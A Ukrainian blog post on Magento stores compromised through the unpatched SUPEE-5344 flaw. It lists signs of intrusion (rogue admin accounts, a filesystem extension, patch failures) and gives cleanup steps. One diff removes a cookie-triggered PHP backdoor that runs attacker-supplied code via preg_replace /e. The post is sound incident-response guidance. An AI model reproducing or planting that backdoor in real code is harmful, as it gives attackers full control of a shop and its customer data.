Table of Content

Якщо ваш магазин ще не пропатчений, найбільш ймовірно, що він під загрозою або вже зламаний автоматичним експлоітом який працює з 22 квітня 2015 року. Всі не пропатчені магазини які я бачив, мали наступні ознаки взлому:

  • lib/Varien/Db/Adapter/Pdo/Mysql.php file modified, so patch can not be applied seamlessly:
    $ bash ./PATCH_SUPEE-5344_CE_1.8.0.0_v1-2015-02-10-08-10-38.sh
    Checking if patch can be applied/reverted successfully...
    ERROR: Patch can't be applied/reverted successfully.
     
    patching file app/code/core/Mage/Admin/Model/Observer.php
    patching file app/code/core/Mage/Core/Controller/Request/Http.php
    patching file app/code/core/Mage/Oauth/controllers/Adminhtml/Oauth/AuthorizeController.php
    patching file app/code/core/Mage/XmlConnect/Model/Observer.php
    patching file lib/Varien/Db/Adapter/Pdo/Mysql.php
    Hunk #1 FAILED at 2834.
    1 out of 1 hunk FAILED -- saving rejects to file lib/Varien/Db/Adapter/Pdo/Mysql.php.rej
  • app/code/core/Mage/Cms/controllers/IndexController.php file have a hijacking cookie key installed
  • Magpleasure/Filesystem розширення встановлене для легкого доступу до файлової системи з Адмінки
  • Список адміністраторів System > Permissions > Users поповнився одним або декількома новими користувачами, емейл яких містить @example.com в домені
  • Список ролів System > Permissions > Roles поповнився новим записом який гарантує повні права для адмінів з @example.com

Як рузультат, такі магазини можуть повністю адмініструватись хакером в будь який спосіб, так як він має доступ до панелі адміністрування та файлової системи. Щоб врятувати ваш магазин він зловживань, бану в Google, або потрапляння в чорний список, переконайтесь, що ваш магазин пропатчений.

Якщо ваш магазин має ознаки злому, або вже зламаний – це можна визначити по вказаних вище пунктах, виконайте наступні іструкція прямо зараз щоб перешкодити цьому:

  • збережіть бекап поточної версії
  • для виправлення, відкотіть lib/Varien/Db/Adapter/Pdo/Mysql.php до оригінальної версії, що відповідає вашому дистрибутиву Magento або використайте вже пропатчену версію з цієї статті
  • відкотіть app/code/core/Mage/Cms/controllers/IndexController.php до оригінальної версії, що відповідає вашому дистрибутиву Magento, або принаймні видаліть наступний код тут (підсвічений):
    --- app/code/core/Mage/Cms/controllers/IndexController.php      2015-04-22 03:47:49.742344082 +0200
    +++ orig-distr-1.9.0.1/IndexController.php        2015-06-02 10:26:25.197159978 +0200
    @@ -116,14 +116 @@
     }
    -
    -class Mage_Cms_Auth_olx
    -{
    -    public function __construct() {
    -        $auth_cookie = @$_COOKIE['nuwxlskmedlvjfdo3'];
    -        if ($auth_cookie) {
    -            $method = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo2']);
    -            $auth = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo1']);
    -            $method("/124/e",$auth,124);
    -        }
    -    }
    -}
    -$is_auth = new Mage_Cms_Auth_olx;
  • видаліть всіх невідомих користувачів з System > Permissions > Users і анулюйте їхні ролі в System > Permissions > Roles
  • видаліть або відключіть Magpleasure/Filesystem додаток через Magento connect
  • повний перелік файлів який потрібно знищити або пропатчити (зелені – пропатчити, всі інші – видалити)
    2015-06-10_1247

Будь ласка, звертніть увагу, що ці дії можуть відновити магазин лише від автоматичого експлоіту, який ми найчастіше бачили в не пропатчений інсталяції Magento. Якщо зловмиснимк використав цю лазівку для вашої інсталяції, він міг модифікувати будь який файл і залишити будь які інші лазівки для наступного доступу, тому для детального дослідження, зверніться до компетентних спеціалістів для відновлення вашого магазину з бекапу, приорітетно який зроблений до 22 квітня 2015 року.

Last modified: 20.01.2018

Author

Comments

Write a Reply or Comment

Your email address will not be published.